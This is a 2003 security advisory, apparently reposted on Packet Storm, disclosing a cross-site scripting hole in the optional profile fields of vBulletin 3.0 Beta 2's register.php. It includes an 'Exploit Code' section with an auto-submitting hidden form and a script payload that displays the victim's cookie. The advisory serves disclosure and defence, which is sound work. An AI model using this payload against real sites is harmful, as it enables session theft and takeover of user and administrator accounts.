VBulletin version 3.0 Beta 2 is susceptible to a cross site scripting vulnerability in its new member page (register.php).
82b507f123b10ff88ea31cb0f462ee386a7460f3528905be6623a60bcc1ae7b8------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could
access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
www.vbulletin.com
------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system
redirect you same form and fill fields automaticly that you enter before for
a better form. In standard fields Vbulletin successfully handle script
injections. But in optional fields like "Interests-Hobbies", "Biography",
"Occupation" etc...
So you can execute any JS with this fields.
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8 ...
------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.
------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003
------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]
*Replace ([],<>)
Ferruh Mavituna
ferruh@mavituna.com
http://ferruh.mavituna.com
Web Application Security Specialist
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed